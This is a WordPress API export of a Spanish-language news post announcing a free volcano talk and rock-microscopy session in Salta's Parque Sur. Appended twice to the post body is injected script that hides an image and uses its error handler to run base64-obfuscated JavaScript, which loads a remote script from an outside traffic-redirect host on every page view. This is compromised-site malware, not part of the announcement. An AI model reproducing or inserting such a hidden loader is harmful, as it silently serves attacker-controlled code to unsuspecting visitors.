{"id":2320,"date":"2023-03-08T12:31:08","date_gmt":"2023-03-08T15:31:08","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2320"},"modified":"2025-08-14T00:21:42","modified_gmt":"2025-08-14T03:21:42","slug":"participa-de-explorando-los-volcanes-en-el-parque-sur","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2320","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/participa-de-explorando-los-volcanes-en-el-parque-sur-88349\">Particip\u00e1 de \u201cExplorando los volcanes\u201d en el Parque Sur<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#ca3c60\"><em>La actividad se realizar\u00e1 el viernes 10 de marzo a partir de las 17:30 horas. Se podr\u00e1n observar con lupas y microscopios rocas volc\u00e1nicas y otras. La jornada, a cargo de profesionales de la UNSa, se suspende por mal tiempo.<\/em><\/h4>\n\n\n\n<p>Mirar una roca volc\u00e1nica con una lupa, aprender qu\u00e9 es un volc\u00e1n y cu\u00e1les son sus caracter\u00edsticas, son algunos de los aspectos que se podr\u00e1n conocer en la actividad \u201cExplorando los volcanes: Volcanismo para la sociedad\u201d que se realizar\u00e1 en el parque Sur el viernes 10 de marzo a partir de las 17:30 horas. &nbsp;<\/p>\n\n\n\n<p>La charla est\u00e1 a cargo de los Ge\u00f3logos y becarios del CONICET&nbsp;<strong>Esteban Bertea<\/strong>&nbsp;y Mercedes&nbsp;<strong>Cirer<\/strong>, ambos de la Universidad Nacional de Salta. En la oportunidad se abordar\u00e1n los siguientes temas: qu\u00e9 es un volc\u00e1n? cu\u00e1ntos tipos de volcanes existen, c\u00f3mo se realiza el monitoreo de volcanes, &nbsp;cu\u00e1l es la labor del vulcan\u00f3logo, ejemplos de erupciones volc\u00e1nicas hist\u00f3ricas, entre otros. Asimismo, participar\u00e1 la estudiante de Geolog\u00eda de la UNSa<strong>&nbsp;Olivia Arenas<\/strong>&nbsp;quien colaborar\u00e1 en la observaci\u00f3n con microscopio de rocas volc\u00e1nicas y secciones delgadas de rocas.&nbsp;<\/p>\n\n\n\n<p>La actividad no requiere inscripci\u00f3n previa. Se suspende por mal tiempo ya que se realiza al aire libre. La jornada se realizar\u00e1 en los parques Sur y de la Familia en las pr\u00f3ximas semanas.&nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/participa-de-explorando-los-volcanes-en-el-parque-sur-88349\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La actividad se realizar\u00e1 el viernes 10 de marzo a partir de las 17:30 horas. Se podr\u00e1n observar con lupas y microscopios rocas volc\u00e1nicas y otras. La jornada, a cargo de profesionales de la UNSa, se suspende por mal tiempo. Mirar una roca volc\u00e1nica con una lupa, aprender qu\u00e9 es un volc\u00e1n y cu\u00e1les son [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2321,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,17],"tags":[],"class_list":{"0":"post-2320","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2320"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2320"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2320\/revisions"}],"predecessor-version":[{"id":7153,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2320\/revisions\/7153"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2321"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2320"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2320"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2320"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}